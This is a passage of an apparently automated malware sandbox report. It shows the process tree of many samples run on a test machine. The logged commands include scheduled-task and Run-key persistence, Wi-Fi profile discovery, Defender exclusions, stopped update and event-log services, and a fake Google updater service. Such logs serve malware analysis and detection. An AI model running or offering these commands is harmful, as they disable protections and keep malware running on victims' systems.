gACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        7⤵
        
        PID:6504
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\iyyzkdcj\iyyzkdcj.cmdline"
        8⤵
        
        PID:7372
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC17F.tmp" "c:\Users\Admin\AppData\Local\Temp\iyyzkdcj\CSC98CAB86741B04A29928F82102C211764.TMP"
        9⤵
        
        PID:4412
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        6⤵
        
        PID:7828
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        7⤵
        
        PID:7508
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        6⤵
        
        PID:8172
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        7⤵
        
        PID:1404
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        6⤵
        
        PID:7196
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        7⤵
        
        PID:7800
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        6⤵
        
        PID:6596
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        7⤵
        
        PID:7464
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        6⤵
        
        PID:6224
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        7⤵
        
        PID:7752
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "getmac"
        6⤵
        
        PID:3152
        
        C:\Windows\system32\getmac.exe
        
        getmac
        7⤵
        
        PID:7892
  - - C:\Users\Admin\Desktop\Files\bnkrigkawd.exe
      "C:\Users\Admin\Desktop\Files\bnkrigkawd.exe"
      4⤵
      PID:1376
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
        5⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:5520
      - C:\Windows\system32\chcp.com
        
        chcp 65001
        6⤵
        
        PID:7216
      - C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        6⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:7700
      - C:\Windows\system32\findstr.exe
        
        findstr /R /C:"[ ]:[ ]"
        6⤵
        
        PID:6216
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
        5⤵
        
        PID:7680
      - C:\Windows\system32\chcp.com
        
        chcp 65001
        6⤵
        
        PID:7888
      - C:\Windows\system32\netsh.exe
        
        netsh wlan show networks mode=bssid
        6⤵
        
        PID:8144
      - C:\Windows\system32\findstr.exe
        
        findstr "SSID BSSID Signal"
        6⤵
        
        PID:8152
  - - C:\Users\Admin\Desktop\Files\Discord.exe
      "C:\Users\Admin\Desktop\Files\Discord.exe"
      4⤵
      PID:5652
    - - C:\Users\Admin\Desktop\Files\Discord.exe
        
        "C:\Users\Admin\Desktop\Files\Discord.exe"
        5⤵
        
        PID:6668
  - - C:\Users\Admin\Desktop\Files\runtimebroker.exe
      "C:\Users\Admin\Desktop\Files\runtimebroker.exe"
      4⤵
      PID:7892
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:7668
    - - C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        5⤵
        
        PID:7068
      - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6704
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JXK9U1bCp8Vp.bat" "
        6⤵
        
        PID:8004
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        7⤵
        
        PID:5384
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6696
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        7⤵
        
        PID:6688
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:7532
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DNIOAcSWe68S.bat" "
        8⤵
        
        PID:7308
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        9⤵
        
        PID:8556
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        9⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:8916
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        9⤵
        
        PID:8568
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        10⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:7792
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lr5AiAUypShB.bat" "
        10⤵
        
        PID:6404
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        11⤵
        
        PID:3712
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        11⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:9512
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        11⤵
        
        PID:9792
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        12⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2852
  - - C:\Users\Admin\Desktop\Files\InstallerPack_20.1.23770_win64.exe
      "C:\Users\Admin\Desktop\Files\InstallerPack_20.1.23770_win64.exe"
      4⤵
      PID:2568
    - - C:\Windows\SysWOW64\ftp.exe
        
        C:\Windows\SysWOW64\ftp.exe
        5⤵
        
        PID:8576
      - C:\Windows\SysWOW64\explorer.exe
        
        C:\Windows\SysWOW64\explorer.exe
        6⤵
        
        PID:1776
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1776 -s 1924
        7⤵
        Program crash
        
        PID:9688
  - - C:\Users\Admin\Desktop\Files\laz.exe
      "C:\Users\Admin\Desktop\Files\laz.exe"
      4⤵
      PID:9396
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A1B9.tmp\A1BA.tmp\A1BB.bat C:\Users\Admin\Desktop\Files\laz.exe"
        5⤵
        
        PID:9664
- - C:\Users\Admin\Desktop\4363463463464363463463463.exe
    "C:\Users\Admin\Desktop\4363463463464363463463463.exe"
    3⤵
    PID:4820
  - - C:\Users\Admin\Desktop\Files\update.exe
      "C:\Users\Admin\Desktop\Files\update.exe"
      4⤵
      PID:5144
  - - C:\Users\Admin\Desktop\Files\Client-built.exe
      "C:\Users\Admin\Desktop\Files\Client-built.exe"
      4⤵
      PID:5304
  - - C:\Users\Admin\Desktop\Files\ljgksdtihd.exe
      "C:\Users\Admin\Desktop\Files\ljgksdtihd.exe"
      4⤵
      PID:5400
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'ljgksdtihd';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'ljgksdtihd' -Value '"C:\Users\Admin\AppData\Roaming\ljgksdtihd.exe"' -PropertyType 'String'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5656
  - - C:\Users\Admin\Desktop\Files\CondoGenerator.exe
      "C:\Users\Admin\Desktop\Files\CondoGenerator.exe"
      4⤵
      PID:5640
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5916
    - - C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        5⤵
        
        PID:6092
      - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5284
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\PB1EoOxWgzwl.bat" "
        6⤵
        
        PID:396
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        7⤵
        
        PID:6072
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5460
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        7⤵
        
        PID:1548
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3308
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pbVHtTBjJ1mn.bat" "
        8⤵
        
        PID:3388
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        9⤵
        
        PID:5992
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        9⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6116
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        9⤵
        
        PID:6136
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        10⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4112
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\G3eoIPKKxOUS.bat" "
        10⤵
        
        PID:5932
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        11⤵
        
        PID:5580
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        11⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5836
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        11⤵
        
        PID:6412
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        12⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6440
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmXnoL7XFCRW.bat" "
        12⤵
        
        PID:6664
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        13⤵
        
        PID:6820
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        13⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6860
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        13⤵
        
        PID:6212
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        14⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6340
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9PqubwQYeFaF.bat" "
        14⤵
        
        PID:6496
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        15⤵
        
        PID:6480
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        15⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6556
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        15⤵
        
        PID:6928
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        16⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4552
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FzQQ2GLZ63jO.bat" "
        16⤵
        
        PID:6992
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        17⤵
        
        PID:5548
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        17⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5748
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        17⤵
        
        PID:5552
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        18⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6484
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AiwWl8Vpflto.bat" "
        18⤵
        
        PID:7144
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        19⤵
        
        PID:6620
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        19⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6476
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        19⤵
        
        PID:5392
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        20⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6512
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\m2OzmmsrUEIS.bat" "
        20⤵
        
        PID:6484
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        21⤵
        
        PID:7108
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        21⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6160
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        21⤵
        
        PID:7832
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        22⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:8100
  - - C:\Users\Admin\Desktop\Files\chrome_93.exe
      "C:\Users\Admin\Desktop\Files\chrome_93.exe"
      4⤵
      PID:6060
    - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5472
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:3572
      - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        6⤵
        
        PID:3308
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        5⤵
        Launches sc.exe
        
        PID:3348
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        5⤵
        Launches sc.exe
        
        PID:4964
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        5⤵
        Launches sc.exe
        
        PID:4608
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        5⤵
        Launches sc.exe
        
        PID:1224
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        5⤵
        Launches sc.exe
        
        PID:5940
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        5⤵
        Power Settings
        
        PID:4500
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        5⤵
        Power Settings
        
        PID:5220
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        5⤵
        Power Settings
        
        PID:5180
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        5⤵
        Power Settings
        
        PID:3828
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
        5⤵
        Launches sc.exe
        
        PID:5224
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
        5⤵
        Launches sc.exe
        
        PID:5676
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        5⤵
        Launches sc.exe
        
        PID:4404
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
        5⤵
        Launches sc.exe
        
        PID:4468
  - - C:\Users\Admin\Desktop\Files\AA_v3.exe
      "C:\Users\Admin\Desktop\Files\AA_v3.exe"
      4⤵
      PID:6172
  - - C:\Users\Admin\Desktop\Files\spofrln.exe
      "C:\Users\Admin\Desktop\Files\spofrln.exe"
      4⤵
      PID:3180
  - - C:\Users\Admin\Desktop\Files\JJSploit_8.10.7_x64-setup.exe
      "C:\Users\Admin\Desktop\Files\JJSploit_8.10.7_x64-setup.exe"
      4⤵
      PID:6252
  - - C:\Users\Admin\Desktop\Files\FreeYoutubeDownloader.exe
      "C:\Users\Admin\Desktop\Files\FreeYoutubeDownloader.exe"
      4⤵
      PID:4688
    - - C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe
        
        "C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe"
        5⤵
        
        PID:3836
      - C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe
        
        "C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe"
        6⤵
        
        PID:9000
  - - C:\Users\Admin\Desktop\Files\benpolatalemdar.exe
      "C:\Users\Admin\Desktop\Files\benpolatalemdar.exe"
      4⤵
      PID:2204
  - - C:\Users\Admin\Desktop\Files\intro.avi.exe
      "C:\Users\Admin\Desktop\Files\intro.avi.exe"
      4⤵
      PID:7480
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "System Ware" /sc ONLOGON /tr "C:\Users\Admin\Desktop\Files\intro.avi.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6640
    - - C:\Users\Admin\AppData\Roaming\system\systemware.exe
        
        "C:\Users\Admin\AppData\Roaming\system\systemware.exe"
        5⤵
        
        PID:3004
      - C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "System Ware" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\system\systemware.exe" /rl HIGHEST /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:7300
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AKbQVOVol8Lv.bat" "
        6⤵
        
        PID:7384
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        7⤵
        
        PID:8160
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6156
        
        C:\Users\Admin\AppData\Roaming\system\systemware.exe
        
        "C:\Users\Admin\AppData\Roaming\system\systemware.exe"
        7⤵
        
        PID:4208
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "System Ware" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\system\systemware.exe" /rl HIGHEST /f
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:8008
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UOWkhDot81r4.bat" "
        8⤵
        
        PID:5352
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        9⤵
        
        PID:5528
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        9⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:7676
        
        C:\Users\Admin\AppData\Roaming\system\systemware.exe
        
        "C:\Users\Admin\AppData\Roaming\system\systemware.exe"
        9⤵
        
        PID:784
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "System Ware" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\system\systemware.exe" /rl HIGHEST /f
        10⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:8420
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ojaLYZkNcufU.bat" "
        10⤵
        
        PID:9104
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        11⤵
        
        PID:4740
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        11⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:8764
        
        C:\Users\Admin\AppData\Roaming\system\systemware.exe
        
        "C:\Users\Admin\AppData\Roaming\system\systemware.exe"
        11⤵
        
        PID:8392
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "System Ware" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\system\systemware.exe" /rl HIGHEST /f
        12⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:8136
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tklqrmLL3RJ7.bat" "
        12⤵
        
        PID:9380
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        13⤵
        
        PID:9952
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        13⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:9448
        
        C:\Users\Admin\AppData\Roaming\system\systemware.exe
        
        "C:\Users\Admin\AppData\Roaming\system\systemware.exe"
        13⤵
        
        PID:10052
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "System Ware" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\system\systemware.exe" /rl HIGHEST /f
        14⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:10040
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\468kE59eQoiP.bat" "
        14⤵
        
        PID:9192
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        15⤵
        
        PID:8216
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 10052 -s 2288
        14⤵
        Program crash
        
        PID:7404
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 8392 -s 2328
        12⤵
        Program crash
        
        PID:9464
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 784 -s 2268
        10⤵
        Program crash
        
        PID:8656
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4208 -s 2296
        8⤵
        Program crash
        
        PID:6612
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3004 -s 2336
        6⤵
        Program crash
        
        PID:4988
  - - C:\Users\Admin\Desktop\Files\systempreter.exe
      "C:\Users\Admin\Desktop\Files\systempreter.exe"
      4⤵
      PID:6596
  - - C:\Users\Admin\Desktop\Files\vtoroy.exe
      "C:\Users\Admin\Desktop\Files\vtoroy.exe"
      4⤵
      PID:6820
  - - C:\Users\Admin\Desktop\Files\Discord2.exe
      "C:\Users\Admin\Desktop\Files\Discord2.exe"
      4⤵
      PID:7340
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Discord" /tr '"C:\Users\Admin\AppData\Roaming\Discord.exe"' & exit
        5⤵
        
        PID:3004
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "Discord" /tr '"C:\Users\Admin\AppData\Roaming\Discord.exe"'
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:8940
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp3DA0.tmp.bat""
        5⤵
        
        PID:8888
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        6⤵
        Delays execution with timeout.exe
        
        PID:9208
      - C:\Users\Admin\AppData\Roaming\Discord.exe
        
        "C:\Users\Admin\AppData\Roaming\Discord.exe"
        6⤵
        
        PID:8544
  - - C:\Users\Admin\Desktop\Files\keepvid-pro_full2578.exe
      "C:\Users\Admin\Desktop\Files\keepvid-pro_full2578.exe"
      4⤵
      PID:2644
    - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
        
        C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
        5⤵
        
        PID:2920
  - - C:\Users\Admin\Desktop\Files\injector.exe
      "C:\Users\Admin\Desktop\Files\injector.exe"
      4⤵
      PID:3004
    - - C:\Windows\system32\SubDir\Panel.exe
        
        "C:\Windows\system32\SubDir\Panel.exe"
        5⤵
        
        PID:8748
  - - C:\Users\Admin\Desktop\Files\PCclear_Eng_mini.exe
      "C:\Users\Admin\Desktop\Files\PCclear_Eng_mini.exe"
      4⤵
      PID:8628
  - - C:\Users\Admin\Desktop\Files\plswork.exe
      "C:\Users\Admin\Desktop\Files\plswork.exe"
      4⤵
      PID:8052
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "java updater" /sc ONLOGON /tr "C:\Users\Admin\Desktop\Files\plswork.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5384
- C:\Program Files\Google\Chrome\Application\chrome.exe
